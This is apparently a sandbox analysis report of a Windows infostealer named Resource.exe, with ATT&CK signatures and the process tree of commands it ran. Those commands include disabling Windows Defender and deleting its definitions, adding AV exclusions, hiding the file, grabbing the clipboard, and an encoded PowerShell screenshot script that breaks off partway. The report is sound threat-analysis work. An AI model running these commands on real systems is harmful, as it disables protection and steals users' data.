79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88

Analysis

max time kernel
92s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-01-2025 16:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Resource.exe
Size

7.4MB
MD5

cd56d1639c638ef44a1cbcf6756ef2ba
SHA1

784970f33b026fe770d8c0f8938d17b26c428327
SHA256

79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88
SHA512

c00a3be6d4cbc672b4fe3b4afb5072832a870c99d795656380e23d33e9b7b45f2d0851ba86e1d35fe502af2d001cf13e13ff6d431349dc166cfbdcc54bb19b39
SSDEEP

196608:qw0cDemLjv+bhqNVoBKUh8mz4Iv9Pmu1D7wJo:SieaL+9qz8/b4IsuRmo

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1352	powershell.exe
3056	powershell.exe
1648	powershell.exe
4768	powershell.exe
4324	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Resource.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4552	powershell.exe
3680	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
1660	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe
3364	Resource.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com
16	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4024	tasklist.exe
1352	tasklist.exe
404	tasklist.exe
4756	tasklist.exe
2256	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1944	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b88-21.dat	upx
behavioral2/memory/3364-25-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp	upx
behavioral2/memory/3364-30-0x00007FFC83820000-0x00007FFC83843000-memory.dmp	upx
behavioral2/files/0x000a000000023b7b-28.dat	upx
behavioral2/files/0x000a000000023b8b-38.dat	upx
behavioral2/files/0x000a000000023b7d-43.dat	upx
behavioral2/files/0x000a000000023b82-48.dat	upx
behavioral2/files/0x000a000000023b81-47.dat	upx
behavioral2/files/0x000a000000023b80-46.dat	upx
behavioral2/files/0x000a000000023b7f-45.dat	upx
behavioral2/files/0x000a000000023b7e-44.dat	upx
behavioral2/files/0x000a000000023b7c-42.dat	upx
behavioral2/files/0x000a000000023b7a-41.dat	upx
behavioral2/files/0x000a000000023b8d-40.dat	upx
behavioral2/files/0x000a000000023b8c-39.dat	upx
behavioral2/files/0x000a000000023b87-35.dat	upx
behavioral2/files/0x000a000000023b85-34.dat	upx
behavioral2/memory/3364-32-0x00007FFC88590000-0x00007FFC8859F000-memory.dmp	upx
behavioral2/files/0x000a000000023b86-31.dat	upx
behavioral2/memory/3364-56-0x00007FFC83410000-0x00007FFC83429000-memory.dmp	upx
behavioral2/memory/3364-58-0x00007FFC82DF0000-0x00007FFC82E13000-memory.dmp	upx
behavioral2/memory/3364-60-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp	upx
behavioral2/memory/3364-64-0x00007FFC86180000-0x00007FFC8618D000-memory.dmp	upx
behavioral2/memory/3364-63-0x00007FFC82DD0000-0x00007FFC82DE9000-memory.dmp	upx
behavioral2/memory/3364-66-0x00007FFC82A90000-0x00007FFC82AC3000-memory.dmp	upx
behavioral2/memory/3364-74-0x00007FFC72C30000-0x00007FFC73152000-memory.dmp	upx
behavioral2/memory/3364-73-0x00007FFC83820000-0x00007FFC83843000-memory.dmp	upx
behavioral2/memory/3364-71-0x00007FFC73160000-0x00007FFC7322D000-memory.dmp	upx
behavioral2/memory/3364-68-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp	upx
behavioral2/memory/3364-82-0x00007FFC81F80000-0x00007FFC8209C000-memory.dmp	upx
behavioral2/memory/3364-84-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp	upx
behavioral2/memory/3364-83-0x00007FFC82DF0000-0x00007FFC82E13000-memory.dmp	upx
behavioral2/memory/3364-81-0x00007FFC83410000-0x00007FFC83429000-memory.dmp	upx
behavioral2/memory/3364-79-0x00007FFC83790000-0x00007FFC837BD000-memory.dmp	upx
behavioral2/memory/3364-78-0x00007FFC83470000-0x00007FFC8347D000-memory.dmp	upx
behavioral2/memory/3364-77-0x00007FFC862A0000-0x00007FFC862B4000-memory.dmp	upx
behavioral2/memory/3364-54-0x00007FFC83790000-0x00007FFC837BD000-memory.dmp	upx
behavioral2/memory/3364-114-0x00007FFC82DD0000-0x00007FFC82DE9000-memory.dmp	upx
behavioral2/memory/3364-211-0x00007FFC73160000-0x00007FFC7322D000-memory.dmp	upx
behavioral2/memory/3364-210-0x00007FFC82A90000-0x00007FFC82AC3000-memory.dmp	upx
behavioral2/memory/3364-272-0x00007FFC72C30000-0x00007FFC73152000-memory.dmp	upx
behavioral2/memory/3364-310-0x00007FFC83820000-0x00007FFC83843000-memory.dmp	upx
behavioral2/memory/3364-315-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp	upx
behavioral2/memory/3364-309-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp	upx
behavioral2/memory/3364-334-0x00007FFC73160000-0x00007FFC7322D000-memory.dmp	upx
behavioral2/memory/3364-340-0x00007FFC83820000-0x00007FFC83843000-memory.dmp	upx
behavioral2/memory/3364-348-0x00007FFC82A90000-0x00007FFC82AC3000-memory.dmp	upx
behavioral2/memory/3364-347-0x00007FFC73230000-0x00007FFC733A7000-memory.dmp	upx
behavioral2/memory/3364-346-0x00007FFC82DD0000-0x00007FFC82DE9000-memory.dmp	upx
behavioral2/memory/3364-345-0x00007FFC86180000-0x00007FFC8618D000-memory.dmp	upx
behavioral2/memory/3364-344-0x00007FFC82DF0000-0x00007FFC82E13000-memory.dmp	upx
behavioral2/memory/3364-343-0x00007FFC83410000-0x00007FFC83429000-memory.dmp	upx
behavioral2/memory/3364-342-0x00007FFC83790000-0x00007FFC837BD000-memory.dmp	upx
behavioral2/memory/3364-341-0x00007FFC88590000-0x00007FFC8859F000-memory.dmp	upx
behavioral2/memory/3364-339-0x00007FFC733B0000-0x00007FFC73999000-memory.dmp	upx
behavioral2/memory/3364-338-0x00007FFC81F80000-0x00007FFC8209C000-memory.dmp	upx
behavioral2/memory/3364-337-0x00007FFC83470000-0x00007FFC8347D000-memory.dmp	upx
behavioral2/memory/3364-336-0x00007FFC862A0000-0x00007FFC862B4000-memory.dmp	upx
behavioral2/memory/3364-335-0x00007FFC72C30000-0x00007FFC73152000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2244	cmd.exe
60	PING.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4456	WMIC.exe
5112	WMIC.exe
4320	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
784	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
60	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
1352	powershell.exe
4768	powershell.exe
1352	powershell.exe
4768	powershell.exe
4768	powershell.exe
4324	powershell.exe
4324	powershell.exe
4552	powershell.exe
4552	powershell.exe
4552	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
2064	powershell.exe
2064	powershell.exe
1648	powershell.exe
1648	powershell.exe
2392	powershell.exe
2392	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	4756	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3456	WMIC.exe
Token: SeSecurityPrivilege	3456	WMIC.exe
Token: SeTakeOwnershipPrivilege	3456	WMIC.exe
Token: SeLoadDriverPrivilege	3456	WMIC.exe
Token: SeSystemProfilePrivilege	3456	WMIC.exe
Token: SeSystemtimePrivilege	3456	WMIC.exe
Token: SeProfSingleProcessPrivilege	3456	WMIC.exe
Token: SeIncBasePriorityPrivilege	3456	WMIC.exe
Token: SeCreatePagefilePrivilege	3456	WMIC.exe
Token: SeBackupPrivilege	3456	WMIC.exe
Token: SeRestorePrivilege	3456	WMIC.exe
Token: SeShutdownPrivilege	3456	WMIC.exe
Token: SeDebugPrivilege	3456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3456	WMIC.exe
Token: SeRemoteShutdownPrivilege	3456	WMIC.exe
Token: SeUndockPrivilege	3456	WMIC.exe
Token: SeManageVolumePrivilege	3456	WMIC.exe
Token: 33	3456	WMIC.exe
Token: 34	3456	WMIC.exe
Token: 35	3456	WMIC.exe
Token: 36	3456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3456	WMIC.exe
Token: SeSecurityPrivilege	3456	WMIC.exe
Token: SeTakeOwnershipPrivilege	3456	WMIC.exe
Token: SeLoadDriverPrivilege	3456	WMIC.exe
Token: SeSystemProfilePrivilege	3456	WMIC.exe
Token: SeSystemtimePrivilege	3456	WMIC.exe
Token: SeProfSingleProcessPrivilege	3456	WMIC.exe
Token: SeIncBasePriorityPrivilege	3456	WMIC.exe
Token: SeCreatePagefilePrivilege	3456	WMIC.exe
Token: SeBackupPrivilege	3456	WMIC.exe
Token: SeRestorePrivilege	3456	WMIC.exe
Token: SeShutdownPrivilege	3456	WMIC.exe
Token: SeDebugPrivilege	3456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3456	WMIC.exe
Token: SeRemoteShutdownPrivilege	3456	WMIC.exe
Token: SeUndockPrivilege	3456	WMIC.exe
Token: SeManageVolumePrivilege	3456	WMIC.exe
Token: 33	3456	WMIC.exe
Token: 34	3456	WMIC.exe
Token: 35	3456	WMIC.exe
Token: 36	3456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4456	WMIC.exe
Token: SeSecurityPrivilege	4456	WMIC.exe
Token: SeTakeOwnershipPrivilege	4456	WMIC.exe
Token: SeLoadDriverPrivilege	4456	WMIC.exe
Token: SeSystemProfilePrivilege	4456	WMIC.exe
Token: SeSystemtimePrivilege	4456	WMIC.exe
Token: SeProfSingleProcessPrivilege	4456	WMIC.exe
Token: SeIncBasePriorityPrivilege	4456	WMIC.exe
Token: SeCreatePagefilePrivilege	4456	WMIC.exe
Token: SeBackupPrivilege	4456	WMIC.exe
Token: SeRestorePrivilege	4456	WMIC.exe
Token: SeShutdownPrivilege	4456	WMIC.exe
Token: SeDebugPrivilege	4456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4456	WMIC.exe
Token: SeRemoteShutdownPrivilege	4456	WMIC.exe
Token: SeUndockPrivilege	4456	WMIC.exe
Token: SeManageVolumePrivilege	4456	WMIC.exe
Token: 33	4456	WMIC.exe
Token: 34	4456	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1316 wrote to memory of 3364	1316	Resource.exe	83
PID 1316 wrote to memory of 3364	1316	Resource.exe	83
PID 3364 wrote to memory of 1416	3364	Resource.exe	84
PID 3364 wrote to memory of 1416	3364	Resource.exe	84
PID 3364 wrote to memory of 5008	3364	Resource.exe	85
PID 3364 wrote to memory of 5008	3364	Resource.exe	85
PID 3364 wrote to memory of 3896	3364	Resource.exe	88
PID 3364 wrote to memory of 3896	3364	Resource.exe	88
PID 3364 wrote to memory of 1852	3364	Resource.exe	89
PID 3364 wrote to memory of 1852	3364	Resource.exe	89
PID 5008 wrote to memory of 1352	5008	cmd.exe	134
PID 5008 wrote to memory of 1352	5008	cmd.exe	134
PID 1416 wrote to memory of 4768	1416	cmd.exe	93
PID 1416 wrote to memory of 4768	1416	cmd.exe	93
PID 1852 wrote to memory of 4756	1852	cmd.exe	94
PID 1852 wrote to memory of 4756	1852	cmd.exe	94
PID 3896 wrote to memory of 1948	3896	cmd.exe	95
PID 3896 wrote to memory of 1948	3896	cmd.exe	95
PID 3364 wrote to memory of 3432	3364	Resource.exe	97
PID 3364 wrote to memory of 3432	3364	Resource.exe	97
PID 3432 wrote to memory of 3456	3432	cmd.exe	99
PID 3432 wrote to memory of 3456	3432	cmd.exe	99
PID 3364 wrote to memory of 4320	3364	Resource.exe	204
PID 3364 wrote to memory of 4320	3364	Resource.exe	204
PID 4320 wrote to memory of 3156	4320	cmd.exe	104
PID 4320 wrote to memory of 3156	4320	cmd.exe	104
PID 3364 wrote to memory of 1488	3364	Resource.exe	105
PID 3364 wrote to memory of 1488	3364	Resource.exe	105
PID 1488 wrote to memory of 4572	1488	cmd.exe	178
PID 1488 wrote to memory of 4572	1488	cmd.exe	178
PID 3364 wrote to memory of 4528	3364	Resource.exe	108
PID 3364 wrote to memory of 4528	3364	Resource.exe	108
PID 4528 wrote to memory of 4456	4528	cmd.exe	110
PID 4528 wrote to memory of 4456	4528	cmd.exe	110
PID 3364 wrote to memory of 4728	3364	Resource.exe	111
PID 3364 wrote to memory of 4728	3364	Resource.exe	111
PID 4728 wrote to memory of 5112	4728	cmd.exe	113
PID 4728 wrote to memory of 5112	4728	cmd.exe	113
PID 3364 wrote to memory of 1944	3364	Resource.exe	114
PID 3364 wrote to memory of 1944	3364	Resource.exe	114
PID 3364 wrote to memory of 3132	3364	Resource.exe	115
PID 3364 wrote to memory of 3132	3364	Resource.exe	115
PID 1944 wrote to memory of 4044	1944	cmd.exe	149
PID 1944 wrote to memory of 4044	1944	cmd.exe	149
PID 3132 wrote to memory of 4324	3132	cmd.exe	119
PID 3132 wrote to memory of 4324	3132	cmd.exe	119
PID 3364 wrote to memory of 1804	3364	Resource.exe	120
PID 3364 wrote to memory of 1804	3364	Resource.exe	120
PID 3364 wrote to memory of 3992	3364	Resource.exe	197
PID 3364 wrote to memory of 3992	3364	Resource.exe	197
PID 1804 wrote to memory of 4024	1804	cmd.exe	124
PID 1804 wrote to memory of 4024	1804	cmd.exe	124
PID 3992 wrote to memory of 2256	3992	cmd.exe	125
PID 3992 wrote to memory of 2256	3992	cmd.exe	125
PID 3364 wrote to memory of 4908	3364	Resource.exe	126
PID 3364 wrote to memory of 4908	3364	Resource.exe	126
PID 3364 wrote to memory of 3680	3364	Resource.exe	128
PID 3364 wrote to memory of 3680	3364	Resource.exe	128
PID 3364 wrote to memory of 1396	3364	Resource.exe	129
PID 3364 wrote to memory of 1396	3364	Resource.exe	129
PID 4908 wrote to memory of 208	4908	cmd.exe	167
PID 4908 wrote to memory of 208	4908	cmd.exe	167
PID 3680 wrote to memory of 4552	3680	cmd.exe	133
PID 3680 wrote to memory of 4552	3680	cmd.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4044	attrib.exe
1860	attrib.exe
1524	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Resource.exe
"C:\Users\Admin\AppData\Local\Temp\Resource.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1316
- C:\Users\Admin\AppData\Local\Temp\Resource.exe
  "C:\Users\Admin\AppData\Local\Temp\Resource.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Resource.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Resource.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"
      4⤵
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4320
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Resource.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Resource.exe"
      4⤵
      Views/modifies file attributes
      PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1804
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3992
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4908
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1396
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3292
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2092
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1896
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAI